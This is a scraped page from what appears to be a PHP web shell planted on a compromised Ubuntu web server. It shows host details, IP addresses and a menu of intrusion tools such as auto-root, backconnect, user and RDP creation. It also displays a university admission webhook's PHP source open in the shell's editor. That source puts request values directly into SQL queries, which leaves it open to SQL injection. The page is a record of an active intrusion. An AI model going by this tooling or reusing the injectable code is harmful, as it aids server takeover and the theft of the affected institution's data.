Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 18.118.26.7
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
admission /
webhook /
[ HOME SHELL ]
Name
Size
Permission
Action
request.log
49.88
KB
-rwxrwxrwx
webhook.php
3.68
KB
-rw-r--r--
webhookcall.php
3.83
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : webhook.php
<?php $univcode = $_REQUEST['ucod']; $token = $_REQUEST['token']; $type = $_REQUEST['type']; require_once("/var/www/config.php"); if($univcode == '') { $statusCode = -1; $statusMessage = "Kinldy Send University Code"; $jsonLoginArray = array("statusCode" => $statusCode, "statusMessage" => $statusMessage); $returnString = json_encode($jsonLoginArray); print $returnString; die(); }else if($token == '') { $statusCode = -1; $statusMessage = "Kinldy Send Token"; $jsonLoginArray = array("statusCode" => $statusCode, "statusMessage" => $statusMessage); $returnString = json_encode($jsonLoginArray); print $returnString; die(); }else if($type =='') { $statusCode = -1; $statusMessage = "Kinldy Send User Type"; $jsonLoginArray = array("statusCode" => $statusCode, "statusMessage" => $statusMessage); $returnString = json_encode($jsonLoginArray); print $returnString; die(); } $servername = SERVERNAME; $username = USERNAME; $password = PASSWORD; $databse = 'logisys3_comexam'; $conn = new mysqli($servername,$username,$password,$databse); if(!$conn) { die("Connection failed: " . mysqli_connect_error()); } $get_data = "select * from dbname where funivcode ='{$univcode}'"; $result1=$conn->query($get_data); if (mysqli_num_rows($result1) > 0) { $dbnames = array(); $uniname = ""; while($row = mysqli_fetch_assoc($result1)) { $dbnames[$row['FUNIVCODE']] = $row['FDBNAME']; $uniname = $row['FUNIVNAME']; } } $servername = SERVERNAME; $username = USERNAME; $password = PASSWORD; $dbname = $dbnames[$univcode]; $conn = new mysqli($servername, $username, $password, $dbname); $data_json = file_get_contents("php://input"); $data = json_decode($data_json,true); print_r($data['Name']); if(count($data)>0) { $reqtype = $_SERVER['REQUEST_METHOD']; $query = "insert into pg_txn(fres, freqtype, fres1, fcreatedate) values('{$data}','{$reqtype}', '{$data_json}', now())"; $result1 =$conn->query($query); $statusCode = 0; $statusMessage = "Success"; $jsonLoginArray = array("statusCode" => $statusCode, "statusMessage" => $statusMessage); $returnString = json_encode($jsonLoginArray); print $returnString; $fp = fopen('request.log', 'a'); fwrite($fp, "~~~~~~~NEW REQUEST ~~~~~~~ ".PHP_EOL); fwrite($fp, file_get_contents('php://input')); if ($_SERVER['REQUEST_METHOD'] === 'POST') { // Get the raw POST data $rawData = file_get_contents("php://input"); // Decode the JSON data $jsonData = json_decode($rawData, true); // Check if decoding was successful if ($jsonData === null) { http_response_code(400); // Bad Request echo "Invalid JSON data"; } else { //Valid Json Data.. Now get the parameters sent in query string.. We will build the webhook URL this way.. $getQueryParams = $_GET; // processWebhookData($jsonData,$getQueryParams,$incomingReqInString, $fp); } } elseif ($_SERVER['REQUEST_METHOD'] === 'GET') { // Handle GET parameters $getData = $_GET; fwrite($fp, $getData." ".PHP_EOL); print_r($univcode); // processWebhookData($getData,$getData,$incomingReqInString, $fp); } else { // Handle other request methods if necessary http_response_code(405); // Method Not Allowed echo "Unsupported request method"; } die(); }else { $statusCode = -1; $statusMessage = "Kinldy Send Lead Details"; $jsonLoginArray = array("statusCode" => $statusCode, "statusMessage" => $statusMessage); $returnString = json_encode($jsonLoginArray); print $returnString; die(); }
Close
